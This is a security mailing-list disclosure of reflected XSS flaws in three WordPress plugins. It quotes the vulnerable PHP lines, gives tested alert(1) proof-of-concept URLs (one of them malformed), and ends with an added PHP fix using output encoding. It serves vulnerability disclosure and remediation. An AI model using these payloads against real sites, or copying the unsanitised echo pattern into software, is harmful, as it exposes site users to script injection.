oss-sec mailing list archives
Reflected XSS in three Wordpress plugins.
From: "Larry W. Cashdollar" <larry0 () me com>
Date: Wed, 11 May 2016 12:28:33 -0400
Hello List,

I've manually confirmed these vulnerabilities:

Title: Reflected XSS in wordpress plugin enhanced-tooltipglossary v3.2.8
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/enhanced-tooltipglossary

Vulnerability:
There is a reflected XSS vulnerability in the following PHP code
./enhanced-tooltipglossary/backend/views/admin_importexport.php:

19: ?> (<?php echo $_GET['itemsnumber']; ?> items read from file)</div>

The variable itemsnumber appears to send unsanitized data back to the user's browser.

DWF-2016-77246

PoC:
This is a tested exploit:
http://[target]/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=<script>alert(1)</script>&msg=imported

Advisory: http://www.vapidlabs.com/wp/wp_advisory.php?v=37


Title: Reflected XSS in wordpress plugin tera-charts v1.0
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/tera-charts (removed by WP)

Vulnerability:
There is a reflected XSS vulnerability in the following PHP code
./tera-charts/charts/treemap.php:

52: var data_filename = "<?php echo $_GET['fn']; ?>";
55: var chart_userid = "<?php echo $_GET['userid']; ?>";

The variable fn appears to send unsanitized data back to the user's browser.

DWF-2016-77716

PoC:
This is a tested exploit:
http://wp-site/tera-charts/charts/treemap.php?fn=";</script><script>alert(1);</script><script>"&userid=1

Advisory: http://www.vapidlabs.com/wp/wp_advisory.php?v=455


Title: Reflected XSS in wordpress plugin pondol-carousel v1.0 (no response from author)
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/pondol-carousel

Vulnerability:
There is a reflected XSS vulnerability in the following PHP code
./pondol-carousel/pages/admin_create.php:

5: var itemid = "<?php echo $_GET["itemid"];?>";

The variable itemid appears to send unsanitized data back to the user's browser.

DWF-2016-77531

PoC:
This is a tested exploit:
http://wp-sitehttp://192.168.0.115/pondol-carousel/pages/admin_create.php?itemid=";</script><script>alert(1);</script>"

Advisory: http://www.vapidlabs.com/wp/wp_advisory.php?v=524

For more information on DWF assignments see
https://github.com/distributedweaknessfiling/DWF-Documentation
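As an added example (not code from the advisory or from any of the three plugins), the two echo patterns the post describes are shown beside a context-aware fix in plain PHP: the HTML-body context (itemsnumber) and the JavaScript-string context (fn, userid, itemid). The WordPress helpers esc_html() and wp_json_encode() are named in comments only, and the sample inputs are constructed from the advisory's own PoC payloads.

```php
<?php
// Added example: context-aware output encoding for the patterns in the advisory.
// Not from the plugins; plain-PHP equivalents of the WordPress helpers are used
// so the file runs outside WordPress.

// 1. HTML body context, as in admin_importexport.php line 19:
//    ?> (<?php echo $_GET['itemsnumber']; ?> items read from file)</div>
function render_items_read_fixed(string $itemsnumber): string
{
    // Prefer validating the expected type first (here an integer) and only then
    // encoding. htmlspecialchars() turns < > " ' & into entities, so a payload
    // such as <script>alert(1)</script> is displayed as text, never executed.
    // In WordPress, esc_html() performs the equivalent encoding.
    $safe = htmlspecialchars($itemsnumber, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '(' . $safe . ' items read from file)</div>';
}

// 2. JavaScript string context, as in treemap.php lines 52/55 and admin_create.php line 5:
//    var data_filename = "<?php echo $_GET['fn']; ?>";
// Escaping only the double quote is NOT enough: the advisory's payload starts with
// ";</script> which closes the <script> element at the HTML parser level, before
// any JavaScript quoting rules apply.
function render_js_var_fixed(string $name, string $value): string
{
    // json_encode() yields a valid JS string literal; JSON_HEX_TAG encodes < and >
    // as \u003C / \u003E, so "</script>" can never appear in the emitted markup.
    // In WordPress, wp_json_encode() wraps json_encode() with the same flags available.
    $literal = json_encode(
        $value,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_QUOT | JSON_HEX_APOS
    );
    return 'var ' . $name . ' = ' . $literal . ';';
}

// Constructed inputs taken from the advisory's PoC payloads (no HTTP involved).
$payloads = [
    'itemsnumber' => '<script>alert(1)</script>',
    'fn'          => '";</script><script>alert(1);</script><script>"',
];

$html = render_items_read_fixed($payloads['itemsnumber']);
$js   = render_js_var_fixed('data_filename', $payloads['fn']);
echo $html, "\n", $js, "\n";

// Neither fixed output contains a literal "<script" any more.
assert(strpos($html, '<script') === false);
assert(strpos($js, '<script') === false);
```

The vulnerable originals can be reproduced by replacing either function body with a bare `return` of the raw value; the same two assertions then fail, which makes a handy regression check for a plugin's template layer.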